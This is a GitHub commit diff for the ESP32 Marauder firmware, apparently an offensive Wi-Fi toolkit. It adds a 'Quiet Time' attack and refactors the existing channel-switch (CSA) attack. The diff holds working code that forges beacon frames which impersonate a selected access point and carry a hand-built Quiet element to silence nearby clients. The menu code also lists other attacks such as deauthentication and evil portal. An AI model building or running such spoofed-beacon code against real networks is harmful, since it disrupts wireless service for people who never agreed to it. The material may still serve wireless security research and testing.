Skip to content

Commit 410cca6

Browse files
Merge pull request #1134 from justcallmekoko/develop
Add quiet time attack
2 parents 65d1efa + da78493 commit 410cca6

File tree

3 files changed

+65
-24
lines changed

3 files changed

+65
-24
lines changed

esp32_marauder/MenuFunctions.cpp

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -167,6 +167,7 @@ void MenuFunctions::main(uint32_t currentTime)
167167
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
168168
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AP_SPAM) &&
169169
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_CSA) &&
170+
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_QUIET) &&
170171
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
171172
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
172173
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
@@ -230,6 +231,7 @@ void MenuFunctions::main(uint32_t currentTime)
230231
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
231232
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AP_SPAM) ||
232233
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_CSA) ||
234+
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_QUIET) ||
233235
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
234236
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
235237
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -333,6 +335,7 @@ void MenuFunctions::main(uint32_t currentTime)
333335
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
334336
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AP_SPAM) ||
335337
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_CSA) ||
338+
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_QUIET) ||
336339
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
337340
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
338341
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -400,6 +403,7 @@ void MenuFunctions::main(uint32_t currentTime)
400403
if ((wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
401404
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AP_SPAM) &&
402405
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_CSA) &&
406+
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_QUIET) &&
403407
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
404408
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
405409
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
@@ -1938,6 +1942,11 @@ void MenuFunctions::RunSetup()
19381942
this->drawStatusBar();
19391943
wifi_scan_obj.StartScan(WIFI_ATTACK_CSA, TFT_GREEN);
19401944
});
1945+
this->addNodes(&wifiAttackMenu, "Quiet Time", TFTRED, NULL, BEACON_LIST, [this]() {
1946+
display_obj.clearScreen();
1947+
this->drawStatusBar();
1948+
wifi_scan_obj.StartScan(WIFI_ATTACK_QUIET, TFT_GREEN);
1949+
});
19411950

19421951
evilPortalMenu.parentMenu = &wifiAttackMenu;
19431952
this->addNodes(&evilPortalMenu, text09, TFTLIGHTGREY, NULL, 0, [this]() {

esp32_marauder/WiFiScan.cpp

Lines changed: 54 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -2136,6 +2136,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) {
21362136
this->startWiFiAttacks(scan_mode, color, text_table1[51]);
21372137
else if (scan_mode == WIFI_ATTACK_CSA)
21382138
this->startWiFiAttacks(scan_mode, color, "CSA Attack");
2139+
else if (scan_mode == WIFI_ATTACK_QUIET)
2140+
this->startWiFiAttacks(scan_mode, color, "Quiet Attack");
21392141
else if (scan_mode == WIFI_ATTACK_RICK_ROLL)
21402142
this->startWiFiAttacks(scan_mode, color, text_table1[52]);
21412143
else if (scan_mode == WIFI_ATTACK_FUNNY_BEACON)
@@ -2443,6 +2445,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
24432445
(currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
24442446
(currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
24452447
(currentScanMode == WIFI_ATTACK_CSA) ||
2448+
(currentScanMode == WIFI_ATTACK_QUIET) ||
24462449
(currentScanMode == WIFI_ATTACK_AUTH) ||
24472450
(currentScanMode == WIFI_ATTACK_DEAUTH) ||
24482451
(currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -8802,15 +8805,15 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
88028805
}
88038806
}
88048807

8805-
void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, bool csa) {
8808+
void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, int scan_mode) {
88068809
int post_ssid_len = 12;
88078810

88088811
#ifndef HAS_DUAL_BAND
88098812
set_channel = random(1,15);
88108813
#else
88118814
set_channel = dual_band_channels[random(0, DUAL_BAND_CHANNELS)];
88128815
#endif
8813-
if (csa) {
8816+
if (scan_mode == WIFI_ATTACK_CSA) {
88148817
post_ssid_len = 18;
88158818
while (set_channel == custom_ssid.channel) {
88168819
#ifndef HAS_DUAL_BAND
@@ -8819,17 +8822,15 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
88198822
set_channel = dual_band_channels[random(0, DUAL_BAND_CHANNELS)];
88208823
#endif
88218824
}
8825+
} else if (scan_mode == WIFI_ATTACK_QUIET) {
8826+
post_ssid_len = 44;
8827+
set_channel = custom_ssid.channel;
88228828
}
88238829
this->changeChannel(this->set_channel);
88248830
delay(1);
88258831

8826-
//if (custom_ssid.beacon->size() == 0)
8827-
// return;
8828-
8829-
8830-
// Randomize SRC MAC
8831-
// Randomize SRC MAC
8832-
if (!csa) {
8832+
if ((scan_mode != WIFI_ATTACK_CSA) &&
8833+
(scan_mode != WIFI_ATTACK_QUIET)) {
88338834
packet[10] = packet[16] = random(256);
88348835
packet[11] = packet[17] = random(256);
88358836
packet[12] = packet[18] = random(256);
@@ -8850,7 +8851,8 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
88508851

88518852
int realLen = strlen(ESSID);
88528853
int ssidLen = realLen;
8853-
if (!csa)
8854+
if ((scan_mode != WIFI_ATTACK_CSA) &&
8855+
(scan_mode != WIFI_ATTACK_QUIET))
88548856
ssidLen = random(realLen, 33);
88558857

88568858
int numSpace = ssidLen - realLen;
@@ -8860,27 +8862,55 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
88608862
for(int i = 0; i < realLen; i++)
88618863
packet[38 + i] = ESSID[i];
88628864

8863-
if (!csa) {
8865+
if ((scan_mode != WIFI_ATTACK_CSA) &&
8866+
(scan_mode != WIFI_ATTACK_QUIET)) {
88648867
for(int i = 0; i < numSpace; i++)
88658868
packet[38 + realLen + i] = 0x20;
88668869

88678870
packet[50 + fullLen] = set_channel;
88688871
}
8869-
88708872

8871-
if (!csa) {
8872-
uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
8873-
0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
8873+
const uint8_t* post = nullptr;
8874+
int post_len = 0;
88748875

8875-
for(int i = 0; i < post_ssid_len; i++)
8876-
packet[38 + fullLen + i] = postSSID[i];
8876+
static const uint8_t post_base[] = {
8877+
0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
8878+
0x03, 0x01, 0x04
8879+
};
8880+
8881+
static const uint8_t post_csa[] = {
8882+
0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
8883+
0x03, 0x01, 0x00,
8884+
0x25, 0x03, 0x01, 0x00, 0x03
8885+
};
8886+
8887+
static const uint8_t post_quiet[] = {
8888+
0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
8889+
0x03, 0x01, 0x00, 0x07, 0x06, 0x55, 0x53, 0x20,
8890+
0x64, 0x0b, 0x14, 0x20, 0x01, 0x00, 0x05, 0x04, 0x00, 0x01,
8891+
0x00, 0x00, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0x28, 0x06,
8892+
0x01, 0x05, 0xff, 0xff, 0x00, 0x64
8893+
};
8894+
8895+
uint8_t temp[64]; // big enough for worst case
8896+
if (scan_mode == WIFI_ATTACK_CSA) {
8897+
memcpy(temp, post_csa, sizeof(post_csa));
8898+
temp[12] = custom_ssid.channel;
8899+
temp[16] = set_channel;
8900+
post = temp;
8901+
post_len = sizeof(post_csa);
8902+
} else if (scan_mode == WIFI_ATTACK_QUIET) {
8903+
memcpy(temp, post_quiet, sizeof(post_quiet));
8904+
temp[12] = custom_ssid.channel;
8905+
post = temp;
8906+
post_len = sizeof(post_quiet);
88778907
} else {
8878-
uint8_t postSSID[18] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
8879-
0x03, 0x01, custom_ssid.channel, 0x25, 0x03, 0x01, set_channel, 0x03 };
8880-
for(int i = 0; i < post_ssid_len; i++)
8881-
packet[38 + fullLen + i] = postSSID[i];
8908+
post = post_base;
8909+
post_len = sizeof(post_base);
88828910
}
88838911

8912+
memcpy(packet + (38 + fullLen), post, post_len);
8913+
88848914
packet[34] = custom_ssid.beacon[0];
88858915
packet[35] = custom_ssid.beacon[1];
88868916

@@ -12006,10 +12036,11 @@ void WiFiScan::main(uint32_t currentTime)
1200612036
}
1200712037
}
1200812038
else if ((currentScanMode == WIFI_ATTACK_AP_SPAM) ||
12009-
(currentScanMode == WIFI_ATTACK_CSA)) {
12039+
(currentScanMode == WIFI_ATTACK_CSA) ||
12040+
(currentScanMode == WIFI_ATTACK_QUIET)) {
1201012041
for (int i = 0; i < access_points->size(); i++) {
1201112042
if (access_points->get(i).selected)
12012-
this->broadcastCustomBeacon(currentTime, access_points->get(i), currentScanMode == WIFI_ATTACK_CSA);
12043+
this->broadcastCustomBeacon(currentTime, access_points->get(i), currentScanMode);
1201312044
}
1201412045

1201512046
if (currentTime - initTime >= 1000) {

esp32_marauder/WiFiScan.h

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -153,6 +153,7 @@
153153
#define WIFI_SCAN_SAE_COMMIT 77
154154
#define WIFI_ATTACK_SAE_COMMIT 78
155155
#define WIFI_ATTACK_CSA 79
156+
#define WIFI_ATTACK_QUIET 80
156157

157158
#define WIFI_ATTACK_FUNNY_BEACON 99
158159

@@ -619,7 +620,7 @@ class WiFiScan
619620
//void sendAssociationSleep(const char* ESSID, uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
620621
void broadcastRandomSSID(uint32_t currentTime);
621622
void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
622-
void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, bool csa = false);
623+
void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, int scan_mode);
623624
void broadcastSetSSID(uint32_t current_time, const char* ESSID);
624625
void RunAPScan(uint8_t scan_mode, uint16_t color);
625626
void RunGPSNmea();

0 commit comments

Comments
 (0)